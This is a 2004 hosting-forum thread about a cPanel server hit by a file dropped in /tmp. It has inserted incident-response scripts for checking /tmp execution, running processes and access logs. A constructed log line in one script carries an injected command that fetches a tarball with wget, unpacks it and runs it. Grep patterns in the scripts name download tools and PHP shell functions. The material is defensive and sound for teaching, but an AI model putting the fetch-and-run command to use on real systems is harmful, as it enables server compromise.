The Community Forums


Hacked - help please

Discussion in 'General Discussion' started by Tagor, Jun 21, 2004.

  1. Tagor

    Tagor Well-Known Member

    Joined:
    Mar 6, 2004
    Messages:
    193
    Likes Received:
    0
    Trophy Points:
    16
    Yesterday night I received a message that my server was down for about one hour. Because we have had several attacks before, we have secured our server. However, the security seems not to be 100% secure. We have installed a firewall (APF) that has DDoS protection and filters some IP addresses using DShield. I also secured the /tmp folder using scripts/securetmp. However, I found a file in the /tmp folder called KDE.

    (1) is there a way to check if this script was run in /tmp?
    (2) is there a way to see what happened before the server went down?
    (3) are there any logs about who gained access to /tmp?
    (4) is there a way to find out who uploaded that file?
    (5) is there a way to search in the .php files in /home/ for uploaders who may have uploaded the file?
    (6) is there a way to check if someone can execute files as nobody in the /tmp folder? (does anyone have a simple program to check this?)

    Below I will post the file that was uploaded and the traffic stats of my server.

    Many thanks in advance for helping me!!
     

    Attached Files:

    • kde.tar (20 KB)
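The checks behind questions (1), (5) and (6) above, as an added example that is not part of the original post and not cPanel's own tooling. It assumes a Linux host with /proc and GNU grep, and the cPanel layout of account web roots under /home; the function names are mine. tmp_mount_mode reads a /proc/mounts-style listing and reports whether /tmp carries noexec (the mount that scripts/securetmp is meant to put in place), exec_allowed_in drops a probe script into a directory and tries to run it (as user nobody when run as root, since that is the account a PHP web shell inherits from Apache), procs_running_from lists processes whose binary lives under a directory, and find_upload_sinks greps PHP files for the functions an uploader or web shell would need.

```sh
#!/bin/sh
# Added example, not from the thread or from cPanel. Assumes a Linux host
# with /proc, GNU grep, and cPanel account web roots under /home.

# (6) Does the /tmp entry in a /proc/mounts-style listing carry noexec?
# $1: file in /proc/mounts format (use /proc/mounts on the live box).
# Prints "noexec", "exec", or "not-mounted" (no separate /tmp filesystem).
tmp_mount_mode() {
    awk '$2 == "/tmp" { mode = ($4 ~ /(^|,)noexec(,|$)/) ? "noexec" : "exec" }
         END { print (mode == "" ? "not-mounted" : mode) }' "$1"
}

# (6) Empirical check: drop a probe script into $1 and try to run it.
# Prints "yes" if it executed, "no" otherwise. As root it re-runs the probe
# as user nobody, the account a PHP web shell inherits from Apache.
exec_allowed_in() {
    dir=$1
    probe=$(mktemp "$dir/probe.XXXXXX") || return 1
    printf '#!/bin/sh\nexit 42\n' > "$probe"
    chmod 755 "$probe"
    if [ "$(id -u)" = 0 ] && id nobody >/dev/null 2>&1; then
        su -s /bin/sh -c "$probe" nobody >/dev/null 2>&1 && rc=0 || rc=$?
    else
        "$probe" >/dev/null 2>&1 && rc=0 || rc=$?
    fi
    rm -f "$probe"
    [ "$rc" -eq 42 ] && echo yes || echo no
}

# (1) Processes whose binary lives under $1 (e.g. /tmp). A running copy of
# the dropped file shows up here even after the file itself is deleted,
# because /proc/PID/exe then reads "/tmp/kde (deleted)".
procs_running_from() {
    dir=$1
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case $exe in
            "$dir"/*) echo "${p#/proc/} $exe" ;;
        esac
    done
}

# (5) PHP files under $1 that call the functions an uploader or web shell
# needs. A hit is a file to read, not proof of compromise.
find_upload_sinks() {
    grep -rlE --include='*.php' \
        'move_uploaded_file|(^|[^A-Za-z0-9_])(system|passthru|exec|shell_exec|popen|proc_open)[[:space:]]*\(' \
        "$1" 2>/dev/null
}

# Live usage on the server (assumed paths):  sh tmpcheck.sh run
if [ "${1:-}" = "run" ]; then
    echo "/tmp mount: $(tmp_mount_mode /proc/mounts)"
    echo "exec in /tmp: $(exec_allowed_in /tmp)"
    echo "processes running from /tmp:"; procs_running_from /tmp
    echo "PHP files with shell/upload sinks under /home:"; find_upload_sinks /home
fi
```

A caveat on the noexec result: it blocks a direct ./kde but not an interpreter pointed at the file (perl /tmp/kde.pl, sh /tmp/kde), so a "noexec" answer is one layer of defence, not a verdict that nothing ran from /tmp; that is what the process listing is for.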
  2. Tagor

    And here are the traffic stats.
     


  3. Tagor

    I just found this in WHM:

    It doesn't say anything to me, but maybe someone knows what this does?
     
  4. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    The first thing you need to ensure is that you weren't compromised and that the hacker still doesn't have access.

    Check all running processes, run chkrootkit and do a port scan on your server.

    netstat -an    # every socket, listening and connected, numeric addresses
    ps aux         # every process; look for anything running out of /tmp


    Then go through and start looking at your log files and find which user account the file came through from.
    You might want to look for something such as wget or even the filename itself.

    If you're not feeling good about this then hire someone else to take a look as well. A second opinion and eyes can never hurt.
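The log search suggested in the reply above, worked through as an added example over constructed log lines; it is not code from the thread or from cPanel. It assumes Apache "combined" format access logs, and on a cPanel host the per-domain logs under /usr/local/apache/domlogs/ (one file per domain) and the domain-to-account map /etc/userdomains are assumed paths; the function names are mine. suspicious_requests pulls requests that mention a download tool, the dropped filename or /tmp, decode_hits undoes the URL encoding so the injected shell command reads naturally, hits_by_ip ranks client addresses, and domain_owner maps the vhost log's domain to the cPanel account the file came in through.

```sh
#!/bin/sh
# Added example, not from the thread or from cPanel. Assumes Apache
# combined-format logs; cPanel paths named below are assumptions.

# Constructed sample log (not real traffic): one client probing an upload
# script, then pulling and running a file in /tmp via URL-encoded commands.
sample_log() {
cat <<'EOF'
203.0.113.7 - - [20/Jun/2004:23:41:02 +0200] "GET /gallery/upload.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [20/Jun/2004:23:41:05 +0200] "GET /gallery/upload.php?c=cd%20/tmp;wget%20198.51.100.9/kde.tar;tar%20xf%20kde.tar;./kde HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
192.0.2.44 - - [20/Jun/2004:23:42:10 +0200] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Jun/2004:23:43:00 +0200] "GET /gallery/upload.php?c=ls%20-la%20/tmp HTTP/1.1" 200 300 "-" "Mozilla/4.0"
198.51.100.23 - - [20/Jun/2004:23:43:30 +0200] "POST /forum/login.php HTTP/1.1" 302 0 "-" "Opera/7"
EOF
}

# Requests that mention a download tool, the dropped filename, or /tmp.
# $1: access log. Tune the alternation to the filename you actually found.
suspicious_requests() {
    grep -iE 'wget|curl|lynx|fetch|kde|/tmp' "$1"
}

# Same hits with the common %XX escapes decoded so the command reads plainly.
decode_hits() {
    suspicious_requests "$1" | sed 's/%20/ /g; s/%3[Bb]/;/g; s/%2[Ff]/\//g'
}

# Hit count per client address, loudest first: "count ip".
hits_by_ip() {
    suspicious_requests "$1" | awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Map a domain to its cPanel account via a /etc/userdomains-style file
# ("domain: user" per line). $1: map file, $2: domain.
domain_owner() {
    awk -F': ' -v d="$2" '$1 == d { print $2 }' "$1"
}

# Live usage on a cPanel host (assumed paths): the domlog file name is the
# domain, so the owner lookup closes the loop from request to account.
#   for f in /usr/local/apache/domlogs/*; do
#       top=$(hits_by_ip "$f" | head -1)
#       [ -n "$top" ] && echo "$(basename "$f") owner=$(domain_owner /etc/userdomains "$(basename "$f")") $top"
#   done
```

Run over the constructed sample, two of the five lines match, both from 203.0.113.7, and the decoded second line reads "cd /tmp;wget 198.51.100.9/kde.tar;tar xf kde.tar;./kde", which is the shape of request to look for when a file appears in /tmp under the nobody user.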
     
  5. Tagor

    First, thanks a lot, ramprage!

    I already ran chkrootkit and it didn't find anything except bindshell (but that is normal if you have cPanel installed).

    I removed the kde file from /tmp so the person cannot start it again.

    Would you mind answering the 6 questions above so I can find out some more information?

    Here are some things I have some doubt about:

    I really appreciate your help and I have also often used your great web site :).
     
  6. Tagor

  7. netwrkr

    netwrkr Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    Any chance of you researching your questions rather than have someone spoon feed you the answers?


    Give a man a fish and he will eat for a day; teach a man to fish and he will have food for life.
     